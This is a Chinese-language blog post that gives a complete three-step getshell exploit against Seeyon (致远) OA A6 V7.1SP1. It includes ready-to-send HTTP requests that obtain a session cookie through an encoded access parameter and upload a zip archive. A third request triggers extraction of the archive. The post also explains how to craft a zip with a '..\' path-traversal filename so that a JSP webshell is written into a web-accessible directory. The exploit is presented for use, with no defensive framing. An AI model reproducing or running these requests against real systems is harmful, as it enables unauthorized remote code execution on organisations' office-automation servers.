致远OA 组合getshell

致远OA通杀 最新组合getshell

复现版本:

致远A6-V5协同管理软件.A6 V7.1SP1

在这里插入图片描述

Getshell 分三步

1.获取cookie信息  
2.上传压缩文件   
3.解压压缩文件得到shell

1.获取 cookie

漏洞地址

/seeyon/thirdpartyController.do

数据包:

POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

获取到 cookie
在这里插入图片描述

2.上传压缩文件

漏洞点:

/seeyon/fileUpload.do?method=processUpload&maxSize=
数据包:
更换cookie

POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 更新的cookie
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1416682316313
Content-Length: 1715

-----------------------------1416682316313
Content-Disposition: form-data; name="type"


-----------------------------1416682316313
Content-Disposition: form-data; name="extensions"


-----------------------------1416682316313
Content-Disposition: form-data; name="applicationCategory"


-----------------------------1416682316313
Content-Disposition: form-data; name="destDirectory"


-----------------------------1416682316313
Content-Disposition: form-data; name="destFilename"


-----------------------------1416682316313
Content-Disposition: form-data; name="maxSize"


-----------------------------1416682316313
Content-Disposition: form-data; name="isEncrypt"


-----------------------------1416682316313
Content-Disposition: form-data; name="file1"; filename="test1.zip"
Content-Type: application/x-zip-compressed

zip 
-----------------------------1416682316313--

在这里插入图片描述

3.解压压缩文件

解压文件得到 shell
漏洞地址

/seeyon/ajax.do
数据包:

POST /seeyon/ajax.do HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 更新的cookie
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 142

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2021-04-14","-6482922226625199575"]
image

在这里插入图片描述

达成目的

访问压缩包里的文件进行验证 解压后文件位置位于

/seeyon/common/designer/pageLayout/压缩包里文件名

在这里插入图片描述

制作 zip 文件

layout.xml  必须存在否则在利用解压漏洞时会解压失败空内容即可
shell.jsp  可是任意名称与内容
压缩成 zip 文件

使用文本编辑 zip 包把 shell 文件名前三位替换成 ..\ 修改前和修改后位数不能变否则 zip 文件损坏
两个地方都要该
在这里插入图片描述

在这里插入图片描述


版权声明:本文为weixin_43227251原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。